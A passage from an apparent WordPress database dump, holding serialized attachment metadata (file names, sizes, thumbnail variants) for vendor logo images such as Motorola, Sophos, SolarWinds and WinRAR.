\"file\";s:20:\"LG-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"LG-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"LG-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:19:\"LG-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1996,1832,'_wp_attached_file','2018/12/MapInfo-Logo.png'),(1997,1832,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/MapInfo-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"MapInfo-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"MapInfo-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"MapInfo-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"MapInfo-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"MapInfo-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"MapInfo-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"MapInfo-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"MapInfo-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1998,1833,'_wp_attached_file','2018/12/Motorola-Logo.png'),(1999,1833,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Motorola-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Motorola-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Motorola-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Motorola-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Motorola-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Motorola-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Motorola-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Motorola-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Motorola-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2000,1834,'_wp_attached_file','2018/12/Nitro-Logo.png'),(2001,1834,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Nitro-Logo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Nitro-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Nitro-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Nitro-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Nitro-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Nitro-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Nitro-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Nitro-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2002,1835,'_wp_attached_file','2018/12/Nutanix-Logo.png'),(2003,1835,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Nutanix-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Nutanix-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Nutanix-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Nutanix-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Nutanix-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Nutanix-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Nutanix-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Nutanix-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Nutanix-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2004,1836,'_wp_attached_file','2018/12/Panasonic-Logo.png'),(2005,1836,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:26:\"2018/12/Panasonic-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Panasonic-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Panasonic-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Panasonic-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Panasonic-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Panasonic-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Panasonic-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"Panasonic-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Panasonic-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2006,1837,'_wp_attached_file','2018/12/Qnap-Logo.png'),(2007,1837,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/Qnap-Logo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Qnap-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Qnap-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Qnap-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Qnap-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Qnap-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Qnap-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"Qnap-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2008,1838,'_wp_attached_file','2018/12/Sage-Logo.png'),(2009,1838,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/Sage-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Sage-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Sage-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Sage-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Sage-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Sage-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Sage-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"Sage-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Sage-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2010,1839,'_wp_attached_file','2018/12/SolarWinds-Logo.png'),(2011,1839,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:27:\"2018/12/SolarWinds-Logo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"SolarWinds-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"SolarWinds-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"SolarWinds-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"SolarWinds-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"SolarWinds-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"SolarWinds-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"SolarWinds-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2012,1840,'_wp_attached_file','2018/12/Sophos-Logo.png'),(2013,1840,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/Sophos-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Sophos-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Sophos-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Sophos-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Sophos-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Sophos-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Sophos-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Sophos-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Sophos-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2014,1841,'_wp_attached_file','2018/12/Ubiquiti-Logo.png'),(2015,1841,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Ubiquiti-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Ubiquiti-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Ubiquiti-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Ubiquiti-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Ubiquiti-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Ubiquiti-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Ubiquiti-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Ubiquiti-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Ubiquiti-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2016,1842,'_wp_attached_file','2018/12/WatchGuard-Logo.png'),(2017,1842,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:27:\"2018/12/WatchGuard-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"WatchGuard-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"WatchGuard-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"WatchGuard-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"WatchGuard-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"WatchGuard-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"WatchGuard-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"WatchGuard-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"WatchGuard-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2018,1843,'_wp_attached_file','2018/12/WD-Logo.png'),(2019,1843,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:19:\"2018/12/WD-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"WD-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"WD-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"WD-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"WD-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"WD-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"WD-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:19:\"WD-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"WD-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2020,1844,'_wp_attached_file','2018/12/Winrar-Logo.png'),(2021,1844,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/Winrar-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Winrar-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Winrar-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Winrar-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"